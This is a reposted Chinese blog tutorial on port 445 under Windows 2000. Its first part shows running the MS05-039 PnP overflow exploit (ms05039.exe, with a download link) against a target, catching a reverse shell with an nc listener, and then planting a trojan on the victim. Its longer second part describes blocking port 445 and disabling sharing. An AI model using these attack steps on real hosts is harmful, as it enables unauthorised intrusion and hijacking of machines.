445利用方法

最新推荐文章于 2022-04-17 21:23:24 发布

weixin_34067049

最新推荐文章于 2022-04-17 21:23:24 发布

阅读量841

点赞数

文章标签：网络 shell

原文链接：http://blog.51cto.com/526869727/1718472

版权

转载自：http://www.shangxueba.com/jingyan/390114.html

相关工具

ms05039：

http://down.51cto.com/data/612193

C:\445>ms05039.exe192.168.0.13192.168.0.1112341

　　MS05-039WindowsPnPRemoteOverflowExploit

　　ConnectbackshellcodeEditionBysuperlone[EST]

　　TestedOnWindows2000PROSP4CN

　　[+]Tryingtoconnecttoremoteporton192.168.0.13:445...ESTABLISHED

　　[+]Makingnullsession...OK

　　[+]Tryingtobindpipe...OK

　　Tringtosendcraftedpacket...OK

　　[+]Exploitdone!Checkyourreverseshellon192.168.0.11:1234

　　C:\445>nc.exe-vv-l-p1234

　　listeningon[any]1234...

　　教会你445端口的***与防范：

　　445端口是一个毁誉参半的端口，有了它我们可以在局域网中轻松访问各种共享文件夹或共享打印机，但也正是因为有了它，***们才有了可乘之机，他们能通过该端口偷偷共享你的硬盘，甚至会在悄无声息中将你的硬盘格式化掉！我们所能做的就是想办法不让***有机可乘，封堵住445端口漏洞。简单起见，本文中都以Windows2000为例，对于WindowsXP，步骤基本类似。

　　第一步，我们需要做的是确定一台存在445端口漏洞的主机。可以用扫描工具扫描得到！比如SUPERSCAN这个端口扫描工具。

　　第二步，假设现在我们已经得到一台存在445端口漏洞的主机，那么我们就可以利用瑞士***nc和溢出工具ms05039进行***：

　　F:\445>ms05039目标IP本地IP1234

　　。。。。。。

　　F:\445>nc.exe-vv-l-p1234

　　。。。。。。

　　成功的话，就会返回一个shell，然后就可以用我们常用的命令了。比如让他去下载我们的***或上传一个***给他，然后运行，这样得到一只肉鸡了。

　　看了上面的这些，是不是觉得自己的电脑很危险？不用怕，下面我们就来解除这危险的445端口漏洞：

　　防范445端口漏洞的***方法：

　　1.端口排除法

　　这种方法利用了Windows2000系统的端口排除功能将来自于445端口的所有信息包全部禁止掉，让大

　　恶人们无法接近你的主机，下面是这种方法的具体实现步骤：

　　打开Windows2000系统的开始菜单，选中设置项下面的网络和拨号连接图标，并用鼠标右键单击之，从其后的快捷菜单中，单击浏览命令；

　　在接着出现的窗口中，右击Internet连接图标，选中属性选项，弹出Internet连接属性窗口；

　　打开常规标签页面，将其中的Internet协议(TCP/IP)项选中，然后再单击一下属性按钮，打开Internet协议(TCP/IP)属性设置页面；

　　继续单击该页面中的高级按钮，打开高级TCP/IP设置窗口，选中其中的选项标签，并在该标签页面的可选的设置项中，将TCP/IP筛选选中，再单击一下对应的属性按钮，打开TCP/IP筛选的设置口；

　　由于445端口属于一种TCP端口，你可以在对应TCP端口的设置项处，将只允许项选中，激活下面的添加按钮，单击该按钮，在其后打开的添加筛选器窗口中，将必须用到的几个服务端口号码，都添加进来，而将用不到的445端口号码排除在外，设置完毕后，单击确定按钮，就可以让设置生效了。

　　2.服务关闭法

　　考虑到文件夹或打印机共享服务才会利用到445端口，因此直接将文件夹或打印机共享服务停止掉，同样也能实现关闭445端口的目的，让***无法破坏各种共享资源，下面是关闭文件夹或打印机共享服务的具体步骤：

　　打开Windows2000系统的开始菜单，选中设置项下面的网络和拨号连接图标，并用鼠标右键单击之，从其后的快捷菜单中，单击浏览命令；

　　在接着出现的窗口中，右击Internet连接图标，选中属性选项，弹出Internet连接属性窗口；

　　打开常规标签页面，并在此连接使用下列选定的组件列表框中，将Microsoft网络的文件或打印机共享选项前面的勾号取消，如图2所示。最后单击确定按钮，重新启动系统，Internet上的大恶人们就没有权利访问到各种共享资源了。

　　当然，你也可以在不停止共享服务的条件下，剥夺大恶人们的共享访问权利；利用本地安全设置中的用户权利指派功能，指定Internet上的任何用户都无权访问本地主机，具体步骤为：

　　在Windows2000系统的开始菜单中，依次单击程序　管理工具　本地安全设置选项，接着展开安全设置　本地策略　用户权利指派文件夹，在对应的右边子窗口中选中拒绝从网络访问这台计算机选项，并用鼠标左键双击之；

　　打开设置窗口后，单击添加按钮，从弹出的选择用户或组对话框中选中everyone选项，再单击添加按钮，最后单击确定，这样任何一位用户都无法从网络访问到本地主机。

转载于:https://blog.51cto.com/526869727/1718472

weixin_34067049

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
445利用方法

转载自：http://www.shangxueba.com/jingyan/390114.html相关工具ms05039：http://down.51cto.com/data/612193 C:\445>ms05039.exe192.168.0.13192.168.0.1112341　　MS05-039WindowsPnPRemoteOverflowExpl...
复制链接

扫一扫